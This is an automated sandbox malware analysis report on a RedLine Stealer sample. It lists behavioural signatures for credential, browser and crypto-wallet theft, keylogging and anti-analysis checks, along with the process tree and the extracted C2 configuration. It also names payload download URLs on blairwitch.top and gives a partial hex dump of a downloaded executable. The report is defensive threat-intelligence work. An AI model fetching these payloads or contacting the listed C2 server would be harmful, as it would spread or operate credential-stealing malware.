Loading ...

Play interactive tourEdit tour

Windows Analysis Report VYeSXonMT1.exe

Overview

General Information

Sample Name:VYeSXonMT1.exe
Analysis ID:528743
MD5:0e852a9d4e42120623c0112e53f70992
SHA1:980fed1b88c494360a3eaad95fd3da046bb85f6e
SHA256:6c00faff9e01fa7fe3a9a681658c61b4802817a91b74351f7a3e6ad19540f9f1
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Evader
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
May check the online IP address of the machine
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Creates HTML files with .exe extension (expired dropper behavior)
Contains functionality to register a low level keyboard hook
Sample or dropped binary is a compiled AutoHotkey binary
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Yara detected Autohotkey Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to communicate with device drivers
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

  • System is w10x64
  • VYeSXonMT1.exe (PID: 6972 cmdline: "C:\Users\user\Desktop\VYeSXonMT1.exe" MD5: 0E852A9D4E42120623C0112E53F70992)
    • mopnns.exe (PID: 6312 cmdline: mopnns.exe MD5: 3F91E0102D6832F36DA2D908672B2266)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.215.113.15:21508"], "Bot Id": "mix25.11"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmpJoeSecurity_AutohotkeyDownloaderGenericYara detected Autohotkey Downloader GenericJoe Security
      00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmpJoeSecurity_EvaderYara detected EvaderJoe Security
        00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000004.00000002.476408687.0000000004F40000.00000004.00020000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 11 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              4.2.mopnns.exe.49d0ee8.4.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                4.3.mopnns.exe.74ac80.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  4.2.mopnns.exe.21c54fe.2.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    4.2.mopnns.exe.4f40000.6.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      4.3.mopnns.exe.74ac80.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 9 entries

                        Sigma Overview

                        No Sigma rule has matched

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Found malware configurationShow sources
                        Source: 4.2.mopnns.exe.49d0000.5.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.215.113.15:21508"], "Bot Id": "mix25.11"}
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: VYeSXonMT1.exeVirustotal: Detection: 50%Perma Link
                        Multi AV Scanner detection for domain / URLShow sources
                        Source: http://blairwitch.top/work/mix.exeVirustotal: Detection: 12%Perma Link
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeReversingLabs: Detection: 82%
                        Machine Learning detection for sampleShow sources
                        Source: VYeSXonMT1.exeJoe Sandbox ML: detected
                        Machine Learning detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeJoe Sandbox ML: detected
                        Source: 0.2.VYeSXonMT1.exe.3990e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 0.3.VYeSXonMT1.exe.3a60000.0.unpackAvira: Label: TR/Patched.Ren.Gen

                        Compliance:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeUnpacked PE file: 0.2.VYeSXonMT1.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeUnpacked PE file: 4.2.mopnns.exe.400000.0.unpack
                        Source: VYeSXonMT1.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                        Source: unknownHTTPS traffic detected: 5.9.162.45:443 -> 192.168.2.6:49766 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 5.9.162.45:443 -> 192.168.2.6:49769 version: TLS 1.2
                        Source: Binary string: _.pdb source: mopnns.exe, 00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.475297379.00000000049D0000.00000004.00020000.sdmp, mopnns.exe, 00000004.00000003.402292014.000000000074A000.00000004.00000001.sdmp
                        Source: Binary string: C:\xohare dolihupabimig\kaluyix\73.pdb source: VYeSXonMT1.exe
                        Source: Binary string: C:\bol\voge hixolub\yebu\losevoduzih-fayipa\weginitowa\gevopit.pdb source: mopnns.exe, 00000004.00000000.396223546.0000000000438000.00000002.00020000.sdmp, mopnns.exe.0.dr
                        Source: Binary string: C:\xohare dolihupabimig\kaluyix\73.pdbP source: VYeSXonMT1.exe
                        Source: Binary string: 5C:\bol\voge hixolub\yebu\losevoduzih-fayipa\weginitowa\gevopit.pdb0= source: mopnns.exe, 00000004.00000000.396223546.0000000000438000.00000002.00020000.sdmp, mopnns.exe.0.dr

                        Spreading:

                        barindex
                        Yara detected Autohotkey Downloader GenericShow sources
                        Source: Yara matchFile source: 0.2.VYeSXonMT1.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: VYeSXonMT1.exe PID: 6972, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004770E0 FindFirstFileW,FindClose,GetFileAttributesW,0_2_004770E0
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_00477170 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,0_2_00477170
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_00444070 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,0_2_00444070
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004443B0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_004443B0

                        Networking:

                        barindex
                        Connects to many ports of the same IP (likely port scanning)Show sources
                        Source: global trafficTCP traffic: 185.215.113.15 ports 21508,0,1,2,5,8
                        May check the online IP address of the machineShow sources
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeDNS query: name: iplogger.org
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeDNS query: name: iplogger.org
                        Creates HTML files with .exe extension (expired dropper behavior)Show sources
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeFile created: arinesp.exe.0.dr
                        Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 17:23:43 GMTServer: Apache/2.4.38 (Debian)Last-Modified: Wed, 24 Nov 2021 20:15:01 GMTETag: "47600-5d18e834737b3"Accept-Ranges: bytesContent-Length: 292352Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 03 34 fe 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 6a 03 00 00 66 01 00 00 00 00 00 9b 2c 00 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 04 00 00 04 00 00 a3 a7 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 ef 03 00 78 00 00 00 00 70 04 00 78 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 81 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 9c 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 69 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 26 78 00 00 00 80 03 00 00 7a 00 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 62 00 00 00 00 04 00 00 18 00 00 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 75 00 00 00 70 04 00 00 76 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                        Source: Joe Sandbox ViewIP Address: 185.215.113.15 185.215.113.15
                        Source: Joe Sandbox ViewIP Address: 185.215.113.15 185.215.113.15
                        Source: global trafficTCP traffic: 192.168.2.6:49772 -> 185.215.113.15:21508
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                        Source: VYeSXonMT1.exe, 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmpString found in binary or memory: http://blairwitch.top/jollion/apines.exe
                        Source: VYeSXonMT1.exe, 00000000.00000002.406204176.0000000003A60000.00000004.00000001.sdmpString found in binary or memory: http://blairwitch.top/jollion/apines.exearinesp.exe?
                        Source: VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmpString found in binary or memory: http://blairwitch.top/jollion/apines.exet
                        Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmpString found in binary or memory: http://blairwitch.top/work/mix.exe
                        Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmpString found in binary or memory: http://blairwitch.top/work/mix.exe5
                        Source: VYeSXonMT1.exe, 00000000.00000002.406204176.0000000003A60000.00000004.00000001.sdmpString found in binary or memory: http://blairwitch.top/work/mix.exemopnns.exe?
                        Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmpString found in binary or memory: http://blairwitch.top/work/mix.exep
                        Source: VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
